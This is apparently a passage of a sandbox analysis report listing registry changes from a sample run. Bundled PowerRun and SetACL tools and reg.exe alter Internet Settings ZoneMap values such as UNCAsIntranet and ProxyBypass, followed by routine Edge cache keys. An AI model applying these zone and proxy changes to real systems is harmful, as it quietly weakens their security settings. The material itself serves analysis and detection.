Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | N/A | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | N/A | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | N/A | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | N/A | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | N/A | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | N/A | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\reg.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | N/A | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7eb0ee92bfb2d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{2EF5A3B7-4AEA-42BC-A7EA-57D099F85AC4} = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\msn.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\msn.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e66ac78dbfb2d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
